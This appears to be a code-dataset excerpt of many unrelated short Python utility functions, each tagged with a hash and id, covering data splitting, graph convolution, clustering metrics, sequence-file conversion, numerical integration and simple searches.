import random def train_valid_test_split_by_conversation(conversations, split_ratio=[0.8, 0.1, 0.1]): """Train/Validation/Test split by randomly selected movies""" train_ratio, valid_ratio, test_ratio = split_ratio assert train_ratio + valid_ratio + test_ratio == 1.0 n_conversations = len(conversations) # Random shuffle movie list random.seed(0) random.shuffle(conversations) # Train / Validation / Test Split train_split = int(n_conversations * train_ratio) valid_split = int(n_conversations * (train_ratio + valid_ratio)) train = conversations[:train_split] valid = conversations[train_split:valid_split] test = conversations[valid_split:] print('Train set:', len(train), 'conversations') print('Validation set:', len(valid), 'conversations') print('Test set:', len(test), 'conversations') return train, valid, test
6084f28af77dd2598c9d563b4cbb1a7fda5423ac
697,051
import torch def cheb_conv(laplacian, inputs, weight): """ Chebyshev convolution. Args: laplacian (:obj:`torch.sparse.Tensor`): The laplacian corresponding to the current sampling of the sphere. inputs (:obj:`torch.Tensor`): The current input data being forwarded. weight (:obj:`torch.Tensor`): The weights of the current layer. Returns: :obj:`torch.Tensor`: Inputs after applying Chebyshev convolution. """ B, V, Fin = inputs.shape K, Fin, Fout = weight.shape # B = batch size # V = nb vertices # Fin = nb input features # Fout = nb output features # K = order of Chebyshev polynomials # transform to Chebyshev basis x0 = inputs.permute(1, 2, 0).contiguous() # V x Fin x B x0 = x0.view([V, Fin * B]) # V x Fin*B inputs = x0.unsqueeze(0) # 1 x V x Fin*B if K > 0: x1 = torch.sparse.mm(laplacian, x0) # V x Fin*B inputs = torch.cat((inputs, x1.unsqueeze(0)), 0) # 2 x V x Fin*B for _ in range(1, K - 1): x2 = 2 * torch.sparse.mm(laplacian, x1) - x0 inputs = torch.cat((inputs, x2.unsqueeze(0)), 0) # M x Fin*B x0, x1 = x1, x2 inputs = inputs.view([K, V, Fin, B]) # K x V x Fin x B inputs = inputs.permute(3, 1, 2, 0).contiguous() # B x V x Fin x K inputs = inputs.view([B * V, Fin * K]) # B*V x Fin*K # Linearly compose Fin features to get Fout features weight = weight.view(Fin * K, Fout) inputs = inputs.matmul(weight) # B*V x Fout inputs = inputs.view([B, V, Fout]) # B x V x Fout return inputs
219d3d7055bbe588d3a25de1f05106436f867d24
697,055
def reencode(s): """Reencodes a string using xmlcharrefreplace.""" return s.encode('ascii', 'xmlcharrefreplace').decode()
ff5bd9c2ac6754bf76f3935c947a3081f83a6781
697,056
def decode_note(message): """ Used by note update methods (add/change/remove). Only the latter omits the pitch/pos, and therefore is shorter. """ instrument_id = ord(message[1]) note = { 'id': ord(message[2]) } if len(message) > 3: note['pos'] = ord(message[3]) note['pitch'] = ord(message[4]) return instrument_id, note
fbc5e1bfc39b91447226e6ac5c4c549a8b78de9b
697,057
from typing import List def _bucket_to_range(bucket: int, boundaries: List[float]) -> bytes: """Returns boundaries of bucket as string.""" if bucket == len(boundaries): end = 'inf' else: end = str(boundaries[bucket]) if bucket == 0: start = '-inf' else: start = str(boundaries[bucket - 1]) return ('[' + start + ', ' + end + ']').encode()
78ad10f1db48beba4c909635180e31dff7c5407e
697,058
import aiohttp import json async def fetch(url: str) -> dict: """ Method to easily fetech data from an api """ async with aiohttp.ClientSession() as session: async with session.get(url) as r: data = await r.read() return json.loads(data)
9694a77ebfcb78d70368e8ba305bd1f66b936d2c
697,059
import random def distselect(weight_l): """Perform a weighted selection using the weights from the provided list. Return the selected index""" if not isinstance(weight_l, list): raise Exception("distselect requires a list of values") # Create a weight/index vector weight_v = [] total_w = 0 for i,v in enumerate(weight_l): w = int(v) total_w += w weight_v.append((w, i)) # Order by weight value weight_v.sort(key=lambda e:e[0]) rand_v = random.randint(1, total_w) for we in weight_v: rand_v -= we[0] if rand_v <= 0: # Return the selected index return we[1] # Return the last index return weight_v[-1][1]
8877c957cbd3c82f37f9bec948fb64c1c33dc341
697,060
def load_grid(input_grid): """ Convert the text form of the grid into an array form. For now this input is always the same. If this changes then this code would need to be replaced. """ grid = [ [".#./..#/###"] ] return grid
a7a01542aea9d2332c0e307044930538f8ee42d5
697,061
import requests def retrieve_online_json(url:str) -> dict: """ This function downloads an online json file and returns it. :argument url: The url where to find the json file to retrieve. :return: A dictionary containing all the downloaded data. """ return requests.get(url).json()
d99d7219f91f2ab67bace1b0ef0d4e9c4201318e
697,062
import torch def adjusted_rand_index(true_mask, pred_mask): """ compute the ARI for a single image. N.b. ARI is invariant to permutations of the cluster IDs. See https://en.wikipedia.org/wiki/Rand_index#Adjusted_Rand_index. true_mask: LongTensor of shape [N, C, H, W] background == 0 object 1 == 1 object 2 == 2 ... pred_mask: FloatTensor of shape [N, K, 1, H, W] (mask probs) Returns: ari [N] """ N, C, H, W = true_mask.shape # only need one channel true_mask = true_mask[:,0] # [N, H, W] # convert into oh [N, num_points, max_num_entities] true_group_ids = true_mask.view(N, H * W).long() true_group_oh = torch.nn.functional.one_hot(true_group_ids).float() # exclude background true_group_oh = true_group_oh[...,1:] max_num_entities = true_group_oh.shape[-1] # take argmax across slots for predicted masks pred_mask = pred_mask.squeeze(2) # [N, K, H, W] pred_groups = pred_mask.shape[1] pred_mask = torch.argmax(pred_mask, dim=1) # [N, H, W] pred_group_ids = pred_mask.view(N, H * W).long() pred_group_oh = torch.nn.functional.one_hot(pred_group_ids, pred_groups).float() if max_num_entities == 1 and pred_groups == 1: return 1. n_points = H*W if n_points <= max_num_entities and n_points <= pred_groups: raise ValueError( "adjusted_rand_index requires n_groups < n_points. We don't handle " "the special cases that can occur when you have one cluster " "per datapoint") nij = torch.einsum('bji,bjk->bki', pred_group_oh, true_group_oh) a = torch.sum(nij, 1) b = torch.sum(nij, 2) rindex = torch.sum(nij * (nij - 1), dim=[1,2]) aindex = torch.sum(a * (a - 1), 1) bindex = torch.sum(b * (b - 1), 1) expected_rindex = aindex * bindex / (n_points*(n_points-1)) max_rindex = (aindex + bindex) / 2 ari = (rindex - expected_rindex) / (max_rindex - expected_rindex) return ari
19a56838b86e97188c68e537a2ef2312a3c76ed1
697,063
import re def strip_markdown(s): """ Strip some common markdown out of the description, for the cases where the description is taken from the first paragraph of the text. """ s = re.sub("[\\[\\]]", "", s) s = re.sub("\(.*\)", "", s) return s
e10e02ec385990e908e4096272df40f3dccee364
697,064
def get_expression_samples(header_line): """ Parse header of expression file to return sample names and column indices. Args: header_line (str): Header line from expression file. Returns: act_samples (dict): Dictionary of {sample_name (str): sample_data_index (int)}. sample_data_index is index for data in sample list, not the line as a whole. e.g.: [samp1, samp2, samp3] & [20, 10, 5] for data values, then {'samp1': 0}. """ line_list = header_line.strip().split("\t") samples = line_list[4:] exp_samples = {} for item in samples: samp_idx = samples.index(item) sample = item.split(".")[0] exp_samples[sample] = samp_idx return exp_samples
615ee0421b1efaf4ef45cab9610cea883f9636b1
697,066
import sys import re def fastq_to_fasta(file, new_file): """ Convert fastq file to fasta Fastq format short example: @SEQ_ID GATCTGG + !''**** Fasta format short example: >SEQ_INFO GATCTGG """ try: file_handle_read = open(file, "rt") line = file_handle_read.readline() except EnvironmentError: sys.exit("ERROR: Unable to read file: " + file) try: file_out=open(new_file,"w") except EnvironmentError: sys.exit("ERROR: Unable to write file: " + new_file) sequence="" sequence_id="" while line: if re.search("^@",line): # write previous sequence if sequence: file_out.write(sequence_id) file_out.write(sequence+"\n") sequence_id=line.replace("@",">",1) sequence="" elif re.search("^[A|a|T|t|G|g|C|c|N|n]+$", line): sequence+=line.rstrip() line=file_handle_read.readline() # write out the last sequence if sequence: file_out.write(sequence_id) file_out.write(sequence+"\n") file_out.close() file_handle_read.close() return new_file
6c7acbefc2279bf78953357d7229dec68eac5e17
697,067
def evens(i): """assumes i is a number returns a boolean, True if i is even, else False""" if i % 2 == 0: return True else: return False
2dafcad23f38f4c8a610d24646ef482ef7e99f43
697,069
def ot2bio_ts(ts_tag_sequence): """ ot2bio function for ts tag sequence :param ts_tag_sequence: :return: """ new_ts_sequence = [] n_tag = len(ts_tag_sequence) prev_pos = '$$$' for i in range(n_tag): cur_ts_tag = ts_tag_sequence[i] if cur_ts_tag == 'O': new_ts_sequence.append('O') cur_pos = 'O' else: # current tag is subjective tag, i.e., cur_pos is T # print(cur_ts_tag) cur_pos, cur_sentiment = cur_ts_tag.split('-') if cur_pos == prev_pos: # prev_pos is T new_ts_sequence.append('I-%s' % cur_sentiment) else: # prev_pos is O new_ts_sequence.append('B-%s' % cur_sentiment) prev_pos = cur_pos return new_ts_sequence
0b6ff5c84627b4fff7aad92201c122e23a9ca3a3
697,070
import os def read_bboxes_data(file_path, images_folder): """ 从bounding box的txt文件中读取信息 :param file_path: 保存bounding box信息的txt文件路径 :param images_folder: 图片根目录 :return: 图片路径及bounding box信息 {'images':路径列表,'bboxes':对应的bounding boxes} """ images_path = [] bboxes = [] with open(file_path, 'r') as bboxes_file: for line in bboxes_file: line = line.strip().split(' ') images_path.append(os.path.join(images_folder, line[0])) bboxes.append([[float(_) for _ in line[1:5]]]) bboxes_data = {'images': images_path, 'bboxes': bboxes} return bboxes_data
15ce684172b8de3b1eab048331a7bdc520751bab
697,071
from typing import List def is_cyclic(dp_heads: List[int]) -> bool: """return True if dp_heads is cyclic, else False""" dp_heads = [0] + dp_heads detected = [False] * len(dp_heads) detected[0] = True for word_idx, parent_idx in enumerate(dp_heads[1:]): if detected[word_idx]: continue ancestors = set() node = word_idx while not detected[node]: ancestors.add(node) node = dp_heads[node] if node in ancestors: return True for node in ancestors: detected[node] = True return False
078d32133a90cc3197ca22026ab7b38cec559d97
697,072
def add_column(sheet, meta_column, col, colname): """ Add one empty column to a sheet @param sheet : sheet to be updated @param col : column number @param colname : text for row 0 in the column """ sheet.cell(column=col, row=0).value = colname meta_column[colname] = col return meta_column
9a85d8ef92851bf194c66e1e6b6a7fae9974ce1d
697,073
def composite_simpson(f, b, a, n): """ Calculate the integral from 1/3 Simpson's Rule Parameters: f: Function f(x) a: Initial point b: End point n: Number of intervals Returns: xi: Integral value """ h = (b - a) / n sum_odd = 0 sum_even = 0 for i in range(0, n - 1): x = a + (i + 1) * h print(x) if (i + 1) % 2 == 0: sum_even += f(x) else: sum_odd += f(x) xi = h / 3 * (f(a) + 2 * sum_even + 4 * sum_odd + f(b)) return [xi]
eb06a4776248763a825c9c41f592b736af230238
697,074
def PyMapping_Check(space, w_obj): """Return 1 if the object provides mapping protocol, and 0 otherwise. This function always succeeds.""" return int(space.ismapping_w(w_obj))
f9d0644fc5f7bfeaa3c08b2c2596a4658b2e508b
697,075
def create_shift_vars(prev_shift_vars, model, staff, shifts, shift_days): """Shift variables for current roster period.""" shift_vars = { (staff_member, role, day, shift): model.NewBoolVar( f"staff:{staff_member}_role:{role}_day:{day}_shift:{shift}" ) for staff_member in staff for role in staff[staff_member] for shift in shifts for day in shift_days[shift] } # Combine previous and current shift variables shift_vars = {**prev_shift_vars, **shift_vars} return shift_vars
da61519cbe61cd066c8072382ccf659aad6829e9
697,076
def validate_field(field): """ Return field if it exists otherwise empty string :param field: string to validate :return: field: input string if not empty, empty string otherwise """ if field: pass else: field = '' return field
a7f631372914de355872063d80f40c586c098788
697,077
from random import randint def generate_random_ip(): """ Returns a random IP as a string :return: a random stringified ip :rtype: str """ return '.'.join(str(randint(0, 255)) for _ in range(4))
8ea26fc948664b1d84923f03960e9822a45ecc53
697,078
def linear_search(nums_array: list, search: int) -> int: """ Linear Search Algorithm Time Complexity --> O(N) :param nums_array: list :param search: int :return index: int """ for i in range(len(nums_array)): if search == nums_array[i]: return i return -1
a02db3d42d6b6f1b8b2a82940d3e17d69bbd41e7
697,079
import math def _acosd(v): """Return the arc cosine (measured in in degrees) of x.""" return math.degrees(math.acos(v))
2e31e36a33a4ac25f2b2548733138dcbf910028f
697,081